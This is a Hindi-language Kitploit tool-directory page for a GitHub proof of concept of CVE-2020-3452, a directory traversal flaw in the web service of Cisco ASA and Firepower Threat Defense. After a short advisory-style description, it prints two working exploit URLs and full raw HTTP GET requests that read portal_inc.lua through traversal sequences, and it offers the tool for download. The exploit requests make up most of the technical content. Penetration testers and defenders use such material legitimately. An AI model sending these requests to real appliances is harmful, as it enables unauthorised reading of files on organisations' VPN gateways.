Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/murataydemir/cve-2020-3452
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmurataydemir/cve-2020-3452

CVE-2020-3452

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) और Cisco Firepower Threat Defense (FTD) वेब सेवा केवल-पढ़ने योग्य निर्देशिका ट्रैवर्सल

रिपॉजिटरी देखें
765 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) और Cisco Firepower Threat Defense (FTD) वेब सेवा केवल-पठन डायरेक्टरी ट्रैवर्सल


Cisco Adaptive Security Appliance (ASA) सॉफ़्टवेयर और Cisco Firepower Threat Defense (FTD) सॉफ़्टवेयर के वेब सेवा इंटरफ़ेस में एक भेद्यता किसी अनप्रमाणित, दूरस्थ हमलावर को डायरेक्टरी ट्रैवर्सल हमले करने और लक्षित सिस्टम पर संवेदनशील फ़ाइलें पढ़ने की अनुमति दे सकती है।

यह भेद्यता किसी प्रभावित डिवाइस द्वारा संसाधित HTTP अनुरोधों में URL के उचित इनपुट सत्यापन की कमी के कारण होती है। एक हमलावर किसी प्रभावित डिवाइस पर डायरेक्टरी ट्रैवर्सल कैरेक्टर अनुक्रमों वाला एक क्राफ्टेड HTTP अनुरोध भेजकर इस भेद्यता का शोषण कर सकता है। सफल शोषण हमलावर को लक्षित डिवाइस पर वेब सेवा फ़ाइल सिस्टम के भीतर मनमानी फ़ाइलों को देखने की अनुमति दे सकता है। वेब सेवा फ़ाइल सिस्टम तब सक्षम होता है जब प्रभावित डिवाइस WebVPN या AnyConnect सुविधाओं के साथ कॉन्फ़िगर किया गया हो। इस भेद्यता का उपयोग ASA या FTD सिस्टम फ़ाइलों या अंतर्निहित ऑपरेटिंग सिस्टम (OS) फ़ाइलों तक पहुंच प्राप्त करने के लिए नहीं किया जा सकता है।

root@kitploit:~
https://{host}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
root@kitploit:~
https://{host}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

PoC का चित्र

टूल डाउनलोड करें